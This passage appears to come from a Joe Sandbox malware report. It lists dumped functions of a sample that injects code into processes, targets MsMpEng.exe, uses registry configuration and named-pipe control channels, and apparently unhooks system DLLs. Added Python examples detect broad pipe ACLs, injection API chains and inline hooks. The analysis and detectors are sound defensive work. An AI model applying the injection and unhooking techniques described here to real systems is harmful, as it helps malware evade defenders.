                                                                  • Instruction ID: 03e36ff1f2ebdce795588aba2221a9ed4440791b52474e0c844943549e2df1d7
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 75115735A09F9089EE048B67A8482A9B7E1FB89FD0F594128DF8D93735EF38D4529300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 3db712e85a20a2bbb1e1d20fb619cac631aa4e195e0f1b377965de5bea0f8112
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 56E0ED71611A408AEB049F62E85C3A9B7E2FB88F56F45C024CB4947361EF7D84999750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: 714149d3e2afaf04e94105d74a5f745b9d9f92ff2202fda82418113139e2828f
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 6DE012716119408BEB089F62E8483A9F7E2FB8CF16F448024CB0947321EE3C8499D710

                                                                  Callgraph

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                                  • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\dialerconfig$SeDebugPrivilege$dialerdll32$dialerdll64$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                  • API String ID: 3658652915-98388624
                                                                  • Opcode ID: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                                  • Instruction ID: 64b8ffd44a99f3ce8fcd0b7b346b5b7659867d38c7c320bcd7049fd2825a730f
                                                                  • Opcode Fuzzy Hash: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                                  • Instruction Fuzzy Hash: C6C1F2F2200A4186EB26DF22F8547DA37A5F78CBD9F814116BB4A43A75DF38C589C744
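The string table of this function includes the SDDL descriptor `D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)` next to the `SeDebugPrivilege`, `SOFTWARE\dialerconfig` and `dialerdll32`/`dialerdll64` strings, and the neighbouring dllhost functions create named pipes with an explicit DACL. The following parser is an added example, not code from the sample or from Joe Sandbox: it decodes that descriptor and flags the allow ACE that grants GENERIC_ALL to Authenticated Users, which on a pipe means any local account can connect to the malware's control channel. The SID and rights tables are constructed subsets of the SDDL abbreviations; `PIPE_SDDL` is the string from the dump.

```python
import re
from dataclasses import dataclass, field

# Constructed subset of the SDDL well-known SID abbreviations, enough for the
# descriptor string recovered from the dump.
SID_ALIASES = {
    "AU": "Authenticated Users",
    "BA": "Builtin Administrators",
    "BU": "Builtin Users",
    "IU": "Interactive Users",
    "SY": "Local System",
    "WD": "Everyone",
}

# Generic rights abbreviations as they appear in the ACE rights field.
RIGHTS = {
    "GA": "GENERIC_ALL",
    "GR": "GENERIC_READ",
    "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}

# Trustees that amount to "any local user" for this check (assumption).
BROAD_TRUSTEES = {"WD", "AU", "IU", "BU"}

ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class Ace:
    ace_type: str                      # "A" allow, "D" deny, ...
    flags: str                         # e.g. "OICI" (object/container inherit)
    rights: list = field(default_factory=list)
    trustee: str = ""


def parse_dacl(sddl: str) -> list:
    """Parse the D: (DACL) component of an SDDL string into Ace records.

    Only the six-field ACE form used in the dump is handled:
    (type;flags;rights;object_guid;inherit_guid;trustee).
    """
    if not sddl.startswith("D:"):
        raise ValueError("expected an SDDL string beginning with D:")
    aces = []
    for m in ACE_RE.finditer(sddl[2:]):
        fields = m.group(1).split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: {m.group(0)}")
        ace_type, flags, rights, _obj, _inh, trustee = fields
        if rights.startswith("0x"):
            rights_list = [rights]     # raw access mask, left as-is
        else:
            rights_list = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append(Ace(ace_type, flags, rights_list, trustee))
    return aces


def overly_broad_allow(sddl: str) -> list:
    """Return (trustee name, rights) for each allow ACE granting GENERIC_ALL or
    GENERIC_WRITE to a broad group. On a named pipe that lets any local account,
    not only the malware's own processes, connect and write commands."""
    hits = []
    for ace in parse_dacl(sddl):
        if ace.ace_type != "A" or ace.trustee not in BROAD_TRUSTEES:
            continue
        if {"GA", "GW"} & set(ace.rights):
            hits.append((SID_ALIASES.get(ace.trustee, ace.trustee),
                         [RIGHTS.get(r, r) for r in ace.rights]))
    return hits


# The descriptor string recovered from the dllhost dump above.
PIPE_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

if __name__ == "__main__":
    for ace in parse_dacl(PIPE_SDDL):
        print(ace)
    print("broad allow ACEs:", overly_broad_allow(PIPE_SDDL))
```

The `OICI` inheritance flags are irrelevant on a pipe object and are carried through unchanged; the check keys only on ACE type, trustee and rights. A descriptor that names specific SIDs or a service account would produce no hits.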

                                                                  Control-flow Graph

                                                                  control_flow_graph 45 140001860-1400018a2 OpenProcess 46 1400018a8-1400018bd IsWow64Process 45->46 47 140001cd0-140001cec 45->47 48 1400018cd 46->48 49 1400018bf-1400018cb 46->49 50 1400018d3-1400018df CloseHandle 48->50 49->50 50->47 51 1400018e5-1400018f0 50->51 51->47 52 1400018f6-14000190b 51->52 53 14000191d 52->53 54 14000190d-140001912 52->54 56 14000191f-140001921 53->56 54->47 55 140001918-14000191b 54->55 55->56 56->47 57 140001927-14000193d OpenProcess 56->57 57->47 58 140001943-14000195c OpenProcess 57->58 59 14000195e-140001975 K32GetModuleFileNameExW 58->59 60 1400019b0-1400019b3 58->60 63 1400019a7-1400019aa CloseHandle 59->63 64 140001977-140001992 PathFindFileNameW lstrlenW 59->64 61 140001a03-140001a22 NtQueryInformationProcess 60->61 62 1400019b5-1400019db 60->62 67 140001cc7-140001cca CloseHandle 61->67 68 140001a28-140001a2c 61->68 66 1400019df-1400019f1 StrCmpIW 62->66 63->60 64->63 65 140001994-1400019a4 StrCpyW 64->65 65->63 66->67 69 1400019f7-140001a01 66->69 67->47 68->67 70 140001a32-140001a4a OpenProcessToken 68->70 69->61 69->66 70->67 71 140001a50-140001a76 GetTokenInformation 70->71 72 140001af3 71->72 73 140001a78-140001a81 GetLastError 71->73 74 140001afa-140001b08 CloseHandle 72->74 73->72 75 140001a83-140001a97 LocalAlloc 73->75 74->67 76 140001b0e-140001b15 74->76 75->72 77 140001a99-140001abf GetTokenInformation 75->77 76->67 78 140001b1b-140001b26 76->78 79 140001ae1 77->79 80 140001ac1-140001adf GetSidSubAuthorityCount GetSidSubAuthority 77->80 78->67 81 140001b2c-140001b36 78->81 82 140001ae8-140001af1 LocalFree 79->82 80->82 83 140001b51 81->83 84 140001b38-140001b42 81->84 82->74 86 140001b55-140001b8d call 1400029ac * 3 83->86 84->67 85 140001b48-140001b4f 84->85 85->86 86->67 93 140001b93-140001bb2 call 1400029ac StrStrA 86->93 96 140001bb4-140001bc4 93->96 97 140001bcb-140001bf1 call 1400029ac * 2 93->97 96->93 98 140001bc6 96->98 97->67 103 140001bf7-140001c20 VirtualAllocEx 97->103 98->67 103->67 104 140001c26-140001c3f WriteProcessMemory 103->104 104->67 105 140001c45-140001c67 call 140002c04 104->105 105->67 108 140001c69-140001c71 105->108 108->67 109 140001c73-140001c80 WaitForSingleObject 108->109 110 140001c82-140001c96 GetExitCodeThread 109->110 111 140001cbc-140001cc1 CloseHandle 109->111 112 140001ca1-140001cba VirtualFreeEx 110->112 113 140001c98-140001c9e 110->113 111->67 112->111 113->112
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$dialer.exe
                                                                  • API String ID: 2456419452-213581914
                                                                  • Opcode ID: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                                  • Instruction ID: c88bb7c69995235f0751d37bc2d3b37891dd0b76cd64fd565fb581fb6c90924f
                                                                  • Opcode Fuzzy Hash: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                                  • Instruction Fuzzy Hash: 66C14BF170064186EB66DF23B8807EA37A1FB89BC4F444129EB4A47BA4DF38C985C744
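The control-flow graph of this function reads, on its success path, as OpenProcess, IsWow64Process, OpenProcess, K32GetModuleFileNameExW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation with GetSidSubAuthority, a string search, VirtualAllocEx, WriteProcessMemory, a call into 140002c04, WaitForSingleObject, GetExitCodeThread and VirtualFreeEx, with `MSBuild.exe`, `MsMpEng.exe`, `ReflectiveDllMain` and `dialer.exe` in its string table. The detector below is an added example, not the sample's code or Joe Sandbox output: it runs the ordered chain OpenProcess, VirtualAllocEx, WriteProcessMemory followed by a remote-execution API over a per-process API-call trace. The trace format (`seq pid api`) and the trace itself are constructed; the dump resolves the execution step only as a call to 140002c04, so the `REMOTE_EXEC_APIS` set is an assumption listing the usual candidates rather than what this sample was observed to call.

```python
from collections import defaultdict

# Ordered prefix of the chain visible in the control-flow graph above.
INJECT_CHAIN = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory")

# Assumed candidates for the "start execution in the target" step; the dump only
# shows a call to 140002c04 here, so this set is not taken from the sample.
REMOTE_EXEC_APIS = {
    "CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx",
    "RtlCreateUserThread", "QueueUserAPC", "NtQueueApcThread", "SetThreadContext",
}

# Constructed trace, one "<seq> <caller pid> <api>" per line. Not sandbox output.
SAMPLE_TRACE = """\
1  4120 OpenProcess
2  4120 IsWow64Process
3  4120 CloseHandle
4  4120 OpenProcess
5  4120 K32GetModuleFileNameExW
6  4120 NtQueryInformationProcess
7  4120 OpenProcessToken
8  4120 GetTokenInformation
9  4120 VirtualAllocEx
10 4120 WriteProcessMemory
11 4120 CreateRemoteThread
12 4120 WaitForSingleObject
13 4120 GetExitCodeThread
14 4120 VirtualFreeEx
15 5560 OpenProcess
16 5560 ReadProcessMemory
17 5560 CloseHandle
18 7710 VirtualAllocEx
19 7710 WriteProcessMemory
20 7710 CreateRemoteThread
"""


def parse_trace(text: str):
    """Turn the constructed trace text into (seq, pid, api) tuples."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        seq, pid, api = line.split()
        events.append((int(seq), int(pid), api))
    return events


def find_injection_chains(events, window: int = 64):
    """Per caller pid, match OpenProcess -> VirtualAllocEx -> WriteProcessMemory in
    order (unrelated calls may sit between them), then any remote-execution API.
    A partial match is abandoned once more than `window` trace entries have
    passed since its OpenProcess. Returns [(pid, [seq of each matched call])]."""
    state = defaultdict(lambda: {"idx": 0, "seqs": [], "start": None})
    hits = []
    for seq, pid, api in events:
        st = state[pid]
        if st["start"] is not None and seq - st["start"] > window:
            st.update(idx=0, seqs=[], start=None)
        if st["idx"] < len(INJECT_CHAIN):
            if api == INJECT_CHAIN[st["idx"]]:
                if st["idx"] == 0:
                    st["start"] = seq
                st["idx"] += 1
                st["seqs"].append(seq)
        elif api in REMOTE_EXEC_APIS:
            hits.append((pid, st["seqs"] + [seq]))
            st.update(idx=0, seqs=[], start=None)
    return hits


if __name__ == "__main__":
    for pid, seqs in find_injection_chains(parse_trace(SAMPLE_TRACE)):
        print(f"pid {pid}: injection chain at trace entries {seqs}")
```

Only pid 4120 is reported. Pid 5560 opens a process and reads it, which is what a debugger or inventory tool does, and pid 7710 never calls OpenProcess in the trace: it allocates and writes into a handle it obtained some other way (a duplicated or inherited handle, or a process it created itself). That second case is the known blind spot of keying the chain on OpenProcess, and is why such a rule is usually paired with a check on how the target handle was obtained.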

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                  • String ID:
                                                                  • API String ID: 4084875642-0
                                                                  • Opcode ID: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                                  • Instruction ID: 28fb11b33fc6f94ec1b72d6715988f9935dfd05350da2d8862b8b96723d9be5a
                                                                  • Opcode Fuzzy Hash: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                                  • Instruction Fuzzy Hash: 145169B27116808AEB66DF63F8587EA26A1F78DBD4F404029EF4947764DF38C586C704

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 3197395349-0
                                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 3993315683-2879589442
                                                                  • Opcode ID: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                                  • Instruction ID: 6d7d95916604e4ffecc7df06e5d7207a05ffde36480a44705d0775a9d4fcdff1
                                                                  • Opcode Fuzzy Hash: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                                  • Instruction Fuzzy Hash: 6871D6B6310A5086EB12EF66F8507DD23A4FB88BC8F016115FB4D97A7ADE38C554C744

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                  • String ID: .text$C:\Windows\System32\
                                                                  • API String ID: 2721474350-832442975
                                                                  • Opcode ID: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                                  • Instruction ID: dfe9efa62791befa50248ca661271f48b6fe4723356168206a8c879346357553
                                                                  • Opcode Fuzzy Hash: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                                  • Instruction Fuzzy Hash: 29516AB230468086EB22DF12F8587DAB3A1FB8CBD5F444215AF4A03BA8DF38C549C704
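This function's API set (CreateFile, CreateFileMapping, MapViewOfFile, VirtualProtect, GetModuleHandle, FreeLibrary, lstrcmpi) together with the strings `.text` and `C:\Windows\System32\` is consistent with mapping a clean copy of a system DLL from disk, locating its `.text` section by a case-insensitive name compare, and writing it over the loaded copy; that is the usual way a loader strips user-mode inline hooks. The inference is the editor's, not a finding stated by the report. The example below is added here and is not the sample's code: it implements the same section-locating step in Python and uses it the way a defender would, to diff a freshly mapped image against the in-memory one and list the bytes that differ. Both inputs are treated as image-layout buffers, as a `SEC_IMAGE` mapping gives, so an RVA is a buffer offset. `build_image` constructs a minimal PE for the demonstration; the stub bytes are constructed and do not come from the sample.

```python
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
SECTION_HEADER_SIZE = 40


def section_headers(image: bytes):
    """Yield (name, virtual_size, virtual_address, raw_size, raw_ptr) per section,
    walking IMAGE_DOS_HEADER.e_lfanew -> PE signature -> COFF header -> section table."""
    if image[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not a PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("not a PE image (missing PE signature)")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", image, coff)
    first = coff + 20 + opt_size
    for i in range(nsections):
        off = first + i * SECTION_HEADER_SIZE
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, off)
        yield name.rstrip(b"\0").decode("ascii", "replace"), vsize, vaddr, rsize, rptr


def find_section(image: bytes, wanted: str = ".text"):
    """Return (virtual_size, virtual_address, raw_size, raw_ptr) of the named section.
    The compare is case-insensitive, matching the lstrcmpi in the dumped function."""
    for name, vsize, vaddr, rsize, rptr in section_headers(image):
        if name.lower() == wanted.lower():
            return vsize, vaddr, rsize, rptr
    raise LookupError(f"section {wanted!r} not found")


def diff_text(mapped_disk: bytes, in_memory: bytes) -> list:
    """Diff the .text of a clean on-disk mapping against the loaded copy.
    Returns [(rva, disk_byte, memory_byte)] for every byte that differs; a
    non-empty result at a function prologue is the signature of an inline hook."""
    vsize, vaddr, _, _ = find_section(mapped_disk)
    clean = mapped_disk[vaddr:vaddr + vsize]
    live = in_memory[vaddr:vaddr + vsize]
    return [(vaddr + i, x, y) for i, (x, y) in enumerate(zip(clean, live)) if x != y]


def build_image(text_bytes: bytes, text_rva: int = 0x1000) -> bytes:
    """Constructed minimal image-layout PE: DOS header, PE signature, COFF header
    with an empty optional header, and a single .text section at text_rva."""
    e_lfanew = 0x40
    img = bytearray(text_rva + len(text_bytes))
    img[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = IMAGE_NT_SIGNATURE
    # Machine AMD64, 1 section, no symbols, SizeOfOptionalHeader 0, characteristics.
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x8664, 1, 0, 0, 0, 0, 0x22)
    sec_off = e_lfanew + 4 + 20
    struct.pack_into("<8sIIII", img, sec_off, b".text", len(text_bytes), text_rva,
                     len(text_bytes), text_rva)
    # Relocation/line-number pointers and counts are zero; characteristics = code|exec|read.
    struct.pack_into("<IIHHI", img, sec_off + 24, 0, 0, 0, 0, 0x60000020)
    img[text_rva:text_rva + len(text_bytes)] = text_bytes
    return bytes(img)


# Constructed x64 stub (mov r10,rcx; mov eax,imm32; syscall; ret) padded with nops.
CLEAN_TEXT = bytes.fromhex("4c8bd1b8190000000f05c3") + b"\x90" * 5
# The same stub with its first five bytes replaced by a jmp rel32, as an inline
# hook would leave it. The displacement value is arbitrary.
HOOKED_TEXT = b"\xe9\x11\x22\x33\x44" + CLEAN_TEXT[5:]


def demo() -> list:
    """Diff a clean image against a hooked copy; returns the differing RVAs."""
    return [rva for rva, _, _ in diff_text(build_image(CLEAN_TEXT), build_image(HOOKED_TEXT))]


if __name__ == "__main__":
    print("hooked bytes at RVAs:", [hex(r) for r in demo()])
```

Run against real modules, the on-disk side comes from mapping the file in `C:\Windows\System32\` with `SEC_IMAGE` and the in-memory side from the module base returned by GetModuleHandle, and every difference inside `.text` should then be explained either by relocation fix-ups or by a hook; the malware's version of this routine does the write instead of the diff.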

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                  • String ID: M$\\.\pipe\dialerchildproc
                                                                  • API String ID: 2203880229-1753684470
                                                                  • Opcode ID: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                                  • Instruction ID: c448ab6558bdd7463f57c5c12a5a219c56a73407a56f172addbd9e8e0ddff9c1
                                                                  • Opcode Fuzzy Hash: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                                  • Instruction Fuzzy Hash: 1C1139F121868492E726EB22F8047EA6764B78DBE0F444225FB9A436F6DF7CC548C704

                                                                  Control-flow Graph

                                                                  control_flow_graph 208 140002cb8-140002cc2 209 140002cc5-140002cd8 call 140002300 208->209 212 140002ce5-140002cf2 ConnectNamedPipe 209->212 213 140002cda-140002ce3 Sleep 209->213 214 140002cf4-140002d15 ReadFile 212->214 215 140002d29-140002d2e Sleep 212->215 213->209 216 140002d34-140002d3d DisconnectNamedPipe 214->216 217 140002d17-140002d1c 214->217 215->216 216->212 217->216 218 140002d1e-140002d27 217->218 218->216
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                  • String ID: \\.\pipe\dialercontrol
                                                                  • API String ID: 2071455217-3404160161
                                                                  • Opcode ID: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                                  • Instruction ID: 4aa5465129413e2f39cc36440aa91cbf4e29d23be742ebc323825d4ea6cf5422
                                                                  • Opcode Fuzzy Hash: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                                  • Instruction Fuzzy Hash: 080148B120464082FB16EB22F8547EA6360A79DBE1F554225FB66436F5CE7CC948CB00

                                                                  Control-flow Graph (rendered graph not extracted; basic-block address ranges and edges follow)
                                                                  control_flow_graph 228 14000363c-140003690 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 229 140003692-1400036a5 K32EnumProcesses 228->229 230 1400036a7-1400036b6 229->230 231 1400036ef-1400036f8 Sleep 229->231 232 1400036b8-1400036bc 230->232 233 1400036e0-1400036eb 230->233 231->229 234 1400036be 232->234 235 1400036cf-1400036d2 call 140003198 232->235 233->231 236 1400036c2-1400036c7 234->236 239 1400036d6 235->239 237 1400036c9-1400036cd 236->237 238 1400036da-1400036de 236->238 237->235 237->236 238->232 238->233 239->238
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
